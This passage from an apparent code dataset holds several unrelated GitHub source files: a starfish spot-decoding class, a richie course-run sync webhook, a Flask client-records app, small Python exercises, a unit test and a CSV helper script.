np.array([self._int_to_target[v] for v in targets])\n\n def target_as_str(self, integer_target: int) -> str:\n return self._int_to_target[integer_target]\n\n\nclass CombineAdjacentFeatures:\n\n def __init__(\n self,\n min_area: Number,\n max_area: Number,\n connectivity: int = 2,\n mask_filtered_features: bool = True\n ) -> None:\n \"\"\"Combines pixel-wise adjacent features into single larger features using skimage.measure\n\n Parameters\n ----------\n min_area : Number\n Combined features with area below this value are marked as failing filters\n max_area : Number\n Combined features with area above this value are marked as failing filters\n connectivity : int\n Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor. 
See\n            http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.label for more\n            detail. Default = 2.\n        mask_filtered_features : bool\n            If True, sets all pixels that are failing filters applied prior to this function equal\n            to zero, the background value for skimage.measure.label\n\n        \"\"\"\n        self._min_area = min_area\n        self._max_area = max_area\n        self._connectivity = connectivity\n        self._mask_filtered = mask_filtered_features\n\n    @staticmethod\n    def _intensities_to_decoded_image(\n        intensities: IntensityTable,\n        target_map: TargetsMap,\n        mask_filtered_features: bool = True\n    ) -> np.ndarray:\n        \"\"\"\n        Construct an image where each pixel corresponds to its decoded target, mapped to a unique\n        integer ID\n\n        Parameters\n        ----------\n        intensities : IntensityTable\n            Decoded intensities\n        target_map : TargetsMap\n            Mapping between string target names and integer target IDs\n        mask_filtered_features : bool\n            If true, all features that fail filters are mapped to zero, which is considered\n            'background' and will not decode to a target (default = True).\n\n        Returns\n        -------\n        np.ndarray[int]\n            Image whose pixels are coded as the targets that the ImageStack decoded to at each\n            position.\n\n        \"\"\"\n        # reverses the linearization that was used to transform an ImageStack into an IntensityTable\n        max_x = intensities[Axes.X.value].values.max() + 1\n        max_y = intensities[Axes.Y.value].values.max() + 1\n        max_z = intensities[Axes.ZPLANE.value].values.max() + 1\n\n        int_targets = target_map.targets_as_int(intensities[Features.TARGET].values)\n        if mask_filtered_features:\n            fails_filters = np.where(~intensities[Features.PASSES_THRESHOLDS])[0] # type: ignore\n            int_targets[fails_filters] = 0\n\n        decoded_image: np.ndarray = int_targets.reshape((max_z, max_y, max_x))\n        return decoded_image\n\n    @staticmethod\n    def _calculate_mean_pixel_traces(\n        label_image: np.ndarray,\n        intensities: IntensityTable,\n    ) -> IntensityTable:\n        \"\"\"\n        For all pixels that contribute to a connected component, calculate the mean value for\n        each (round, ch), producing an average \"trace\" of a feature across the imaging experiment\n\n        Parameters\n        ----------\n        label_image : np.ndarray\n            An image where all pixels of a connected component share the same integer ID\n        intensities : IntensityTable\n            decoded intensities\n\n        Returns\n        -------\n        IntensityTable :\n            an IntensityTable where the number of features equals the number of connected components\n            and the intensity of each feature is its mean trace.\n\n        \"\"\"\n\n        pixel_labels = label_image.reshape(-1)\n\n        # Use a pandas groupby-based approach, because it is much faster than xarray\n\n        # If needed, it is possible to be even faster than pandas:\n        # https://stackoverflow.com/questions/51975512/\\\n        # faster-alternative-to-perform-pandas-groupby-operation\n\n        # stack intensities\n        stacked = intensities.stack(traces=(Axes.ROUND.value, Axes.CH.value))\n\n        # drop into pandas to use their faster groupby\n        traces: pd.DataFrame = pd.DataFrame(\n            stacked.values,\n            index=pixel_labels,\n            columns=stacked.traces.to_index()\n        )\n\n        # group the per-pixel distances under the same label index\n        distances: pd.Series = pd.Series(\n            stacked[Features.DISTANCE].values, index=pixel_labels\n        )\n\n        grouped = traces.groupby(level=0)\n        pd_mean_pixel_traces = grouped.mean()\n\n        grouped = distances.groupby(level=0)\n        pd_mean_distances = grouped.mean()\n\n        pd_xarray = IntensityTable(\n            pd_mean_pixel_traces,\n            dims=(Features.AXIS, 'traces'),\n            coords=dict(\n                traces=('traces', pd_mean_pixel_traces.columns),\n                distance=(Features.AXIS, 
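\n                # per-component mean of the decoding distance, aligned with the feature index\n                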
pd_mean_distances),\n                features=(Features.AXIS, pd_mean_pixel_traces.index)\n            )\n        )\n        mean_pixel_traces = pd_xarray.unstack('traces')\n\n        # the 0th pixel trace corresponds to background. If present, drop it.\n        try:\n            mean_pixel_traces = mean_pixel_traces.drop_sel({Features.AXIS: 0})\n        except KeyError:\n            pass\n\n        return cast(IntensityTable, mean_pixel_traces)\n\n    @staticmethod\n    def _single_spot_attributes(\n        spot_property: _RegionProperties,\n        decoded_image: np.ndarray,\n        target_map: TargetsMap,\n        min_area: Number,\n        max_area: Number,\n    ) -> Tuple[Dict[str, Union[Number, str]], int]:\n        \"\"\"\n        Calculate starfish SpotAttributes from the RegionProperties of a connected component\n        feature.\n\n        Parameters\n        ----------\n        spot_property: _RegionProperties\n            Properties of the connected component. Output of skimage.measure.regionprops\n        decoded_image : np.ndarray\n            Image whose pixels correspond to the targets that the given position in the ImageStack\n            decodes to.\n        target_map : TargetsMap\n            Unique mapping between string target names and int target IDs.\n        min_area : Number\n            Combined features with area below this value are marked as failing filters\n        max_area : Number\n            Combined features with area above this value are marked as failing filters\n\n        Returns\n        -------\n        Dict[str, Union[Number, str]] :\n            spot attribute dictionary for this connected component, containing\n            the x, y, z position, target name (str) and feature radius.\n        int :\n            1 if spot passes size filters, zero otherwise.\n\n        \"\"\"\n        # regionprops centroids may be 2d or 3d, so we need to support both shapes\n        centroid = spot_property.centroid\n\n        spot_attrs: Dict[str, Union[Number, str]]\n        if len(centroid) == 3:\n            spot_attrs = {\n                'z': int(centroid[0]),\n                'y': int(centroid[1]),\n                'x': int(centroid[2])\n            }\n        else: # data is 2d\n            spot_attrs = {\n                'z': 0,\n                'y': int(centroid[0]),\n                'x': int(centroid[1])\n            }\n\n        # define the target index as the most repeated value in the bounding box of the spot.\n        # it appears there is no simpler way to do this with a regionprops object\n        bbox = spot_property.bbox\n        if len(bbox) == 6:\n            # 3d bbox\n            target_candidates = np.ndarray.flatten(\n                decoded_image[bbox[0]:bbox[3], bbox[1]:bbox[4], bbox[2]:bbox[5]])\n        else:\n            # flatten and remove zeros\n            target_candidates = np.ndarray.flatten(\n                decoded_image[0, bbox[0]:bbox[2], bbox[1]:bbox[3]])\n        # get the most repeated nonzero value\n        non_zero_target_candidates = target_candidates[target_candidates != 0]\n        target_index = cast(int, np.argmax(np.bincount(non_zero_target_candidates)))\n        spot_attrs[Features.TARGET] = target_map.target_as_str(target_index)\n        spot_attrs[Features.SPOT_RADIUS] = spot_property.equivalent_diameter / 2\n\n        # filter intensities for which radius is too small\n        passes_area_filter = 1 if min_area <= spot_property.area < max_area else 0\n        return spot_attrs, passes_area_filter\n\n    def _create_spot_attributes(\n        self,\n        region_properties: List[_RegionProperties],\n        decoded_image: np.ndarray,\n        target_map: TargetsMap,\n        n_processes: Optional[int] = None\n    ) -> Tuple[SpotAttributes, np.ndarray]:\n        \"\"\"\n\n        Parameters\n        ----------\n        region_properties : List[_RegionProperties]\n            Properties of each connected component. 
Output of skimage.measure.regionprops\n decoded_image : np.ndarray\n Image whose pixels correspond to the targets that the given position in the ImageStack\n decodes to.\n target_map : TargetsMap\n Unique mapping between string target names and int target IDs.\n n_processes : Optional[int]=None\n number of processes to devote to measuring spot properties. If None, defaults to the\n result of os.nproc()\n\n Returns\n -------\n pd.DataFrame :\n DataFrame containing x, y, z, radius, and target name for each connected component\n feature.\n np.ndarray[bool] :\n An array with length equal to the number of features. If zero, indicates that a feature\n has failed area filters.\n \"\"\"\n with ThreadPoolExecutor(max_workers=n_processes) as tpe:\n mapfunc = tpe.map\n applyfunc = partial(\n self._single_spot_attributes,\n decoded_image=decoded_image,\n target_map=target_map,\n min_area=self._min_area,\n max_area=self._max_area\n )\n\n iterable = tqdm(region_properties, disable=(not StarfishConfig().verbose))\n results = mapfunc(applyfunc, iterable)\n if not results:\n # no spots found\n warnings.warn(\"No spots found, please adjust threshold parameters\")\n return SpotAttributes.empty(extra_fields=['target']), np.array(0, dtype=bool)\n spot_attrs, passes_area_filter = zip(*results)\n\n # update passes filter\n passes_filter = np.array(passes_area_filter, dtype=bool)\n\n spot_attributes = SpotAttributes(pd.DataFrame.from_records(spot_attrs))\n spot_attributes.data[Features.SPOT_ID] = np.arange(0, len(spot_attributes.data))\n return spot_attributes, passes_filter\n\n def run(\n self, intensities: IntensityTable,\n n_processes: Optional[int] = None,\n ) -> Tuple[DecodedIntensityTable, ConnectedComponentDecodingResult]:\n \"\"\"\n Execute the combine_adjacent_features method on an IntensityTable containing pixel\n intensities\n\n Parameters\n ----------\n intensities : IntensityTable\n Pixel intensities of an imaging experiment\n n_processes : Optional[int]\n Number of parallel processes to devote to calculating the filter\n\n Returns\n -------\n IntensityTable :\n Table whose features comprise sets of adjacent pixels that decoded to the same target\n ConnectedComponentDecodingResult :\n NamedTuple containing :\n region_properties :\n the properties of each connected component, in the same order as the\n IntensityTable\n label_image : np.ndarray\n An image where all pixels of a connected component share the same integer ID\n decoded_image : np.ndarray\n Image whose pixels correspond to the targets that the given position in the\n ImageStack decodes to.\n\n \"\"\"\n\n # map target molecules to integers so they can be reshaped into an image that can\n # be subjected to a connected-component algorithm to find adjacent pixels with the\n # same targets\n targets = intensities[Features.TARGET].values\n target_map = TargetsMap(targets)\n\n # create the decoded_image\n decoded_image = self._intensities_to_decoded_image(\n intensities,\n target_map,\n self._mask_filtered,\n )\n\n # label the decoded image to extract connected component features\n label_image: np.ndarray = label(decoded_image, connectivity=self._connectivity)\n\n # calculate properties of each feature\n props: List = regionprops(np.squeeze(label_image))\n\n # calculate mean intensities across the pixels of each feature\n mean_pixel_traces = self._calculate_mean_pixel_traces(\n label_image,\n intensities,\n )\n\n # Create SpotAttributes and determine feature filtering outcomes\n spot_attributes, passes_filter = self._create_spot_attributes(\n 
props,\n decoded_image,\n target_map,\n n_processes=n_processes\n )\n\n # augment the SpotAttributes with filtering results and distances from nearest codes\n spot_attributes.data[Features.DISTANCE] = mean_pixel_traces[Features.DISTANCE]\n spot_attributes.data[Features.PASSES_THRESHOLDS] = passes_filter\n\n # create new indexes for the output IntensityTable\n channel_index = mean_pixel_traces.indexes[Axes.CH]\n round_index = mean_pixel_traces.indexes[Axes.ROUND]\n coords = IntensityTable._build_xarray_coords(\n spot_attributes=spot_attributes,\n round_values=round_index,\n channel_values=channel_index)\n\n # create the output IntensityTable\n dims = (Features.AXIS, Axes.ROUND.value, Axes.CH.value)\n intensity_table = DecodedIntensityTable(\n data=mean_pixel_traces, coords=coords, dims=dims\n )\n\n # combine the various non-IntensityTable results into a NamedTuple before returning\n ccdr = ConnectedComponentDecodingResult(props, label_image, decoded_image)\n\n return intensity_table, ccdr\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/spots/DetectPixels/combine_adjacent_features.py","file_name":"combine_adjacent_features.py","file_ext":"py","file_size_in_byte":16807,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"15049829903","text":"from random import randint\n\ndef find_el(i, j, matrix, k):\n\n if k == matrix[i][j]:\n return f'Элемент {k} дайден в ячейке {i+1}, {j+1}.'\n try:\n if k > matrix[i][j]:\n return find_el(i+1, j, matrix, k)\n else:\n return find_el(i, j-1, matrix, k)\n except:\n return f'Элемента {k} нет в матрице'\n\n \n\nm = int(input('Введите количство строк: '))\nn = int(input('Введите количество столбцов: '))\n\nmatrix = [[] for i in range(m)]\nmatrix[0].append(randint(1, 10))\nfor i in range(n-1):\n matrix[0].append(randint(matrix[0][i]+1, matrix[0][i]+10))\n\nfor j in range(1, m):\n matrix[j].append(randint(matrix[j-1][0]+1, matrix[j-1][0]+10))\n\nfor i in range(1, m):\n for j in range(1, n):\n matrix[i].append(randint(max(matrix[i-1][j], matrix[i][j-1])+1, max(matrix[i-1][j], matrix[i][j-1])+10))\n\nprint()\nprint('Сгенерированная матрица:')\nfor i in range(m):\n print(', '.join([str(i) for i in matrix[i]]))\n\nprint()\nk = int(input('Введите искомый элемент: '))\n\nprint(find_el(0, n-1, matrix, k))\n\n\n","repo_name":"Kostik2302/asd-lab-5","sub_path":"Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39100452848","text":"# 14.實作\n\ndef calculate_bmi(h, w):\n BMI = float(w / (h / 100) ** 2)\n return BMI\n\n\nheight = float(input(\"請輸入身高(cm):\"))\nweight = float(input(\"請輸入體重(kg):\"))\n\nBMI = calculate_bmi(height, weight)\nprint(\"身高:\", height, \"體重:\", weight)\nprint(\"BMI:\", BMI)\n","repo_name":"vicwei8128/Python_practise","sub_path":"workspace/Simple_work14.py","file_name":"Simple_work14.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39442072083","text":"\"\"\"\nAPI endpoints for the courses app.\n\"\"\"\nfrom django.conf import settings\nfrom django.db.models import Q\n\nfrom cms import signals as cms_signals\nfrom cms.models import Page\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom 
rest_framework.serializers import as_serializer_error\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom .exceptions import MissingResourceLinkError\nfrom .lms import LMSHandler\nfrom .models import Course, CourseRun, CourseRunSyncMode\nfrom .serializers import CourseRunSerializer\nfrom .utils import get_signature, normalize_code\n\n\nclass NotAllowed(BasePermission):\n    \"\"\"\n    Utility permission class to deny all requests. This is used as a default to close\n    requests to unsupported actions.\n    \"\"\"\n\n    def has_permission(self, request, view):\n        \"\"\"\n        Always deny permission.\n        \"\"\"\n        return False\n\n\nclass CourseRunsViewSet(ModelViewSet):\n    \"\"\"\n    API endpoints to access and perform actions on course runs.\n    \"\"\"\n\n    permission_classes = [NotAllowed]\n    queryset = CourseRun.objects.all()\n    serializer_class = CourseRunSerializer\n\n    def get_permissions(self):\n        \"\"\"\n        Manage permissions for builtin DRF methods on ViewSets.\n        \"\"\"\n        if self.action == \"retrieve\":\n            permission_classes = []\n        else:\n            try:\n                permission_classes = getattr(self, self.action).kwargs.get(\n                    \"permission_classes\"\n                )\n            except AttributeError:\n                permission_classes = self.permission_classes\n\n        return [permission() for permission in permission_classes]\n\n\n# pylint: disable=too-many-locals,too-many-branches\ndef sync_course_run(data):\n    \"\"\"\n    Synchronize a course run from its data.\n\n    Parameters\n    ----------\n    data : dict\n        A dictionary describing a course run of the form:\n        {\n            \"resource_link\": \"http://example.edx:8073/courses/course-v1:edX+DemoX+01/course/\",\n            \"start\": \"2020-12-09T09:31:59.417817Z\",\n            \"end\": \"2021-03-14T09:31:59.417895Z\",\n            \"enrollment_start\": \"2020-11-09T09:31:59.417936Z\",\n            \"enrollment_end\": \"2020-12-24T09:31:59.417972Z\",\n            \"languages\": [\"en\", \"fr\"],\n            \"enrollment_count\": 42,\n            \"catalog_visibility\": \"course_and_search\",\n        }\n\n    Returns\n    -------\n    None or raises:\n        MissingResourceLinkError: the data dictionary is missing a \"resource_link\" key\n        ValidationError: something is wrong in the data. 
The error dict describes the error.\n\n \"\"\"\n # Select LMS from resource link\n resource_link = data.get(\"resource_link\")\n if not resource_link:\n raise MissingResourceLinkError()\n\n lms = LMSHandler.select_lms(resource_link)\n if lms is None:\n raise ValidationError(\n {\"resource_link\": [\"No LMS configuration found for this resource link.\"]}\n )\n sync_mode = lms.default_course_run_sync_mode\n\n target_course_runs = CourseRun.objects.filter(resource_link=resource_link)\n draft_course_runs = target_course_runs.filter(draft_course_run__isnull=True)\n\n # Clean data before instiating a serializer with it\n cleaned_data = lms.clean_course_run_data(data)\n serializer = lms.get_course_run_serializer(\n cleaned_data, partial=bool(draft_course_runs)\n )\n\n if serializer.is_valid() is not True:\n raise ValidationError(serializer.errors)\n validated_data = serializer.validated_data\n\n if draft_course_runs:\n # Remove fields that are protected for update\n validated_data = {\n key: value\n for (key, value) in validated_data.items()\n if key not in lms.configuration.get(\"COURSE_RUN_SYNC_NO_UPDATE_FIELDS\", [])\n }\n\n for course_run in draft_course_runs.filter(\n sync_mode__in=[\n CourseRunSyncMode.SYNC_TO_DRAFT,\n CourseRunSyncMode.SYNC_TO_PUBLIC,\n ]\n ):\n nb_updated = CourseRun.objects.filter(\n Q(pk=course_run.pk)\n | Q(\n draft_course_run__sync_mode=CourseRunSyncMode.SYNC_TO_PUBLIC,\n draft_course_run=course_run,\n )\n ).update(**validated_data)\n\n public_course = course_run.direct_course.public_extension\n if course_run.sync_mode == CourseRunSyncMode.SYNC_TO_PUBLIC:\n if public_course:\n # If the public course run did not exist yet it has to be created\n if nb_updated == 1:\n public_course.copy_relations(course_run.direct_course)\n\n # What we did has changed the public course page. We must reindex it\n cms_signals.post_publish.send(\n sender=Page,\n instance=course_run.direct_course.extended_object,\n language=None,\n )\n else:\n course_run.refresh_from_db()\n course_run.mark_course_dirty()\n return\n\n # We need to create a new course run\n if lms.default_course_run_sync_mode == CourseRunSyncMode.MANUAL:\n raise ValidationError(\n {\"resource_link\": [\"Unknown course run when creation is deactivated.\"]}\n )\n\n # Look for the course targeted by the resource link\n course_code = normalize_code(lms.extract_course_code(data))\n try:\n course = Course.objects.distinct().get(\n code=course_code,\n extended_object__publisher_is_draft=True,\n # Exclude snapshots\n extended_object__node__parent__cms_pages__course__isnull=True,\n )\n except Course.DoesNotExist as exc:\n # Create the course page in draft\n raise ValidationError(\n {\"resource_link\": [f\"Unknown course: {course_code:s}.\"]}\n ) from exc\n\n # Instantiate a new draft course run\n draft_course_run = CourseRun(\n direct_course=course, sync_mode=sync_mode, **validated_data\n )\n\n # Create the related public course run if necessary\n if sync_mode == CourseRunSyncMode.SYNC_TO_PUBLIC:\n # Don't mark the related course page dirty and directly add\n # the course run to the corresponding public course page\n draft_course_run.save()\n if course.public_extension_id:\n public_course_run = CourseRun(\n direct_course=course.public_extension,\n draft_course_run=draft_course_run,\n sync_mode=sync_mode,\n **validated_data,\n )\n public_course_run.save()\n\n # What we did has changed the public course page. 
We must reindex it\n cms_signals.post_publish.send(\n sender=Page, instance=course.extended_object, language=None\n )\n else:\n # Save the draft course run marking the course page dirty\n draft_course_run.save()\n draft_course_run.mark_course_dirty()\n\n\n# pylint: disable=too-many-return-statements,unused-argument, too-many-locals,too-many-branches\n@api_view([\"POST\"])\ndef sync_course_runs_from_request(request, version):\n \"\"\"View for the web hook to create or update course runs based on their resource link.\n\n - An existing course run is updated only if its \"sync_mode\" field is set to something else\n than \"manual\".\n\n - The public version of a course run is updated only if its \"sync_mode\" field is set to\n \"sync_to_public\". Otherwise, only the draft version is updated and the related course\n is marked dirty.\n\n - A new course run is created only if the \"DEFAULT_COURSE_RUN_SYNC_MODE\" parameter is set\n to something else than \"manual\" in the lms configuration (or the setting\n \"RICHIE_DEFAULT_COURSE_RUN_SYNC_MODE\" in the absence of LMS preference). Otherwise, only\n existing course runs are updated.\n\n - A new public course run is created only if the \"DEFAULT_COURSE_RUN_SYNC_MODE\" parameter\n is set to \"sync_to_public\" in the lms configuration (or the setting\n \"RICHIE_DEFAULT_COURSE_RUN_SYNC_MODE\" in the absence of LMS preference). Otherwise, only\n the draft course run is created and the related course is marked dirty.\n\n Parameters\n ----------\n request : Type[django.http.request.HttpRequest]\n The request on the API endpoint, it should contain a payload with course run fields.\n\n Returns\n -------\n Type[rest_framework.response.Response]\n HttpResponse acknowledging the success or failure of the synchronization operation.\n \"\"\"\n message = request.body.decode(\"utf-8\")\n\n # Check if the provided signature is valid against any secret in our list\n #\n # We need to do this to support 2 or more versions of our infrastructure at the same time.\n # It then enables us to do updates and change the secret without incurring downtime.\n authorization_header = request.headers.get(\"Authorization\")\n if not authorization_header:\n return Response(\"Missing authentication.\", status=403)\n\n signature_is_valid = any(\n authorization_header == get_signature(message, secret)\n for secret in getattr(settings, \"RICHIE_COURSE_RUN_SYNC_SECRETS\", [])\n )\n\n if not signature_is_valid:\n return Response(\"Invalid authentication.\", status=401)\n\n if isinstance(request.data, (list, tuple)):\n result = {}\n status = 200\n if not all(\"resource_link\" in d for d in request.data):\n return Response({\"resource_link\": [\"This field is required.\"]}, status=400)\n for data in request.data:\n try:\n sync_course_run(data)\n except ValidationError as error:\n result[data[\"resource_link\"]] = as_serializer_error(error)\n status = 400\n else:\n result[data[\"resource_link\"]] = {\"success\": True}\n return Response(result, status=status)\n\n try:\n sync_course_run(request.data)\n except MissingResourceLinkError:\n return Response({\"resource_link\": [\"This field is required.\"]}, status=400)\n\n return Response({\"success\": True})\n","repo_name":"openfun/richie","sub_path":"src/richie/apps/courses/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10303,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"11839374080","text":"# This file is part of swprocess, a Python package for surface wave 
processing.\r\n# Copyright (C) 2020 Joseph P. Vantassel (joseph.p.vantassel@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\"\"\"Test for interact module.\"\"\"\r\n\r\nimport warnings\r\nfrom unittest.mock import patch\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom swprocess.interact import ginput_session\r\nfrom testtools import unittest, TestCase\r\n\r\n\r\nclass Test_Interact(TestCase):\r\n\r\n @patch('matplotlib.pyplot.ginput', return_value=[(0.5, 0.5), (0, 1)])\r\n @patch('matplotlib.pyplot.waitforbuttonpress', return_value=True)\r\n def test_ginput_session(self, input_a, input_b):\r\n _, ax = plt.subplots()\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n xs, ys = ginput_session(ax=ax, npts=2, initial_adjustment=True,\r\n ask_to_continue=True)\r\n\r\n self.assertListEqual([0], xs)\r\n self.assertListEqual([1], ys)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"jpvantassel/swprocess","sub_path":"test/test_interact.py","file_name":"test_interact.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"73428902506","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///clients.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Article(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n tel = db.Column(db.String(20))\n type = db.Column(db.String(10))\n device = db.Column(db.String(100))\n defect = db.Column(db.Text)\n description = db.Column(db.Text)\n date = db.Column(db.DateTime, default=datetime.utcnow)\n part_price = db.Column(db.Integer())\n total_price = db.Column(db.Integer())\n income = db.Column(db.Integer)\n\n def __repr__(self):\n return '
<Article %r>' % self.id\n\n\n'''\n@app.route('/')\n@app.route('/home')\ndef index():\n    #first way was:\n    #return render_template('index.html')\n    #then this:\n    arts = Article.query.order_by(Article.date.desc()).all()\n    return render_template('posts.html', arts=arts)\n'''\n\n\n@app.route('/about')\ndef about():\n    return render_template('about.html')\n\n\n@app.route('/', methods=['POST', 'GET'])\n@app.route('/home', methods=['POST', 'GET'])\ndef posts():\n    # get first element from table\n    # articles = Article.query.first()\n    # get all elements\n    # articles = Article.query.all()\n    # get all elements sorted by column\n\n    if request.method == \"POST\":\n        find = request.form['find']\n        find = find.lower()\n        \n        articles = Article.query.order_by(Article.date.desc()).all()\n\n        texts = []\n        for el in articles:\n            s = \"{} {} {} {} {} {} {} {} {}\".format(el.name, el.tel, el.type, el.device, el.defect, el.description, el.part_price, el.total_price, el.income).lower()\n            texts.append(s)\n        \n        matches = []\n        for row in texts:\n            if find in row:\n                matches.append(texts.index(row))\n        \n        arts = []\n        for index in matches:\n            arts.append(articles[index])\n        \n        return render_template('posts.html', arts=arts)\n    \n    else:\n        \n        arts = Article.query.order_by(Article.date.desc()).all()\n        return render_template('posts.html', arts=arts)\n\n\n@app.route('/posts/<int:id>')\ndef post_detail(id):\n    article = Article.query.get(id)\n    return render_template('post_detail.html', article=article)\n\n\n@app.route('/posts/<int:id>/delete')\ndef post_delete(id):\n    article = Article.query.get_or_404(id)\n\n    try:\n        db.session.delete(article)\n        db.session.commit()\n        return redirect('/')\n    except:\n        return \"Error. Post was not deleted...\"\n\n\n@app.route('/create_article', methods=['POST', 'GET'])\ndef create_article():\n    if request.method == \"POST\":\n        name = request.form['name']\n        tel = request.form['tel']\n        type = request.form['type']\n        device = request.form['device']\n        defect = request.form['defect']\n        description = request.form['description']\n        part_price = request.form['part_price']\n        total_price = request.form['total_price']\n        income = int(total_price) - int(part_price)\n        # print(type(part_price))\n        # print(type(total_price))\n\n        article = Article(name=name,\n                          tel=tel,\n                          type=type,\n                          device=device,\n                          defect=defect,\n                          description=description,\n                          part_price=part_price,\n                          total_price=total_price,\n                          income=income\n                          )\n\n        db.session.add(article)\n        db.session.commit()\n        return redirect('/')\n\n    # except: return \"There was an error adding the article...\"\n\n    else:\n        return render_template('create_article.html')\n\n\n@app.route('/post/<int:id>/update', methods=['POST', 'GET'])\ndef post_update(id):\n    article = Article.query.get(id)\n    if request.method == \"POST\":\n        article.name = request.form['name']\n        article.tel = request.form['tel']\n        article.type = request.form['type']\n        article.device = request.form['device']\n        article.defect = request.form['defect']\n        article.description = request.form['description']\n        article.part_price = request.form['part_price']\n        article.total_price = request.form['total_price']\n        # article.total_price = request.form['income']\n\n        try:\n            db.session.commit()\n            return redirect('/')\n        except:\n            return \"An error occurred while editing the article...\"\n\n    else:\n        return render_template('post_update.html', article=article)\n\n\n'''\n@app.route('/user/<string:name>/<int:id>')\ndef user(name, id):\n    return f\"User: {name}, id: {id}.\"\n'''\n\n\nif __name__ == '__main__':\n    
app.run(debug=True)\n\n\n","repo_name":"Uarsa/blog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34910425391","text":"import collections\nimport heapq\n\nclass Solution:\n def treasureIsland(self, grid):\n q = [(0, 0, 0)]\n visited = set()\n visited.add((0, 0))\n while q:\n i, j, dist = q.pop(0)\n if i == len(grid)-1 and j == 0:\n return dist\n\n elif grid[i][j] == 'O':\n for r, c in ((-1, 0), (1, 0), (0, 1), (0, -1)):\n newr, newc = i+r, j+c\n if 0 <= newr < len(grid) and 0 <= newc < len(grid[0]):\n if grid[newr][newc] != \"D\" and (newr, newc) not in visited:\n q.append((newr, newc, dist+1))\n visited.add((newr, newc))\n\n\nif __name__==\"__main__\":\n solution = Solution()\n print(solution.treasureIsland([['O', 'O', 'O', 'O'],\n ['D', 'O', 'D', 'O'],\n ['O', 'O', 'O', 'O'],\n ['X', 'D', 'D', 'O']]))\n","repo_name":"ashwin2509/Leetcode","sub_path":"Amazon/TreasureIsland.py","file_name":"TreasureIsland.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23036133304","text":"#! /usr/bin/env python\n\n# Copy the attributeLocation from SOURCE to TARGET. Output to stdout.\n\nimport sys\n\ndef addToEntNames(prop2EntNames, prop, entName):\n if prop not in prop2EntNames:\n prop2EntNames[prop] = set()\n prop2EntNames[prop].add(entName)\n\nif len(sys.argv) < 3:\n sys.stderr.write('SYNOPSIS\\n')\n sys.stderr.write(' python %s SOURCE TARGET\\n' % sys.argv[0])\n exit()\n\nsource = sys.argv[1]\ntarget = sys.argv[2]\n\nprop2EntNames = {}\n\n# Read CSV's into lists\nwith open(source) as f:\n linesS = f.read().splitlines()\nwith open(target) as f:\n linesT = f.read().splitlines()\n\n# Transform each CSV row to a list too\nfor i in range(len(linesS)):\n linesS[i] = linesS[i].split(',')\nfor i in range(len(linesT)):\n linesT[i] = linesT[i].split(',')\n\n# Extract the faimsEntityAttributeName/attributeLocation pairs from the source\nfor i in range(len(linesS)):\n propS = linesS[i][3]\n entNameS = linesS[i][5]\n addToEntNames(prop2EntNames, propS, entNameS)\n\n# Transform prop2EntNames from a string -> set() map to a string -> string map\nfor k in prop2EntNames.iterkeys():\n prop2EntNames[k] = ';'.join(prop2EntNames[k])\n\n# Augment the target CSV to include attributeLocations which were extracted\ninsertionPos = 2\nlinesT[0].insert(insertionPos, 'attributeLocation')\nfor i in range(1, len(linesT)):\n propT = linesT[i][1]\n if propT in prop2EntNames:\n entName = prop2EntNames[propT]\n linesT[i].insert(insertionPos, entName)\n else:\n linesT[i].insert(insertionPos, '')\n\n# Transform each list representing a row in the target to a string\nfor i in range(len(linesT)):\n linesT[i] = ','.join(linesT[i])\n\n# Print the result: the transformed target\nfor i in range(len(linesT)):\n sys.stdout.write(linesT[i] + '\\n')\n","repo_name":"shainarussell/Turtle-survey-FAIMS","sub_path":"xml-tools/cp-attrib-location/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37180825900","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Name: Rawan Osama Baker \n# ID: 221002179\n\n# In[56]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n# In[52]:\n\n\nrate = 0.25\n#Population mean is going to be\nmu = 1/rate\n\nAvrage = 
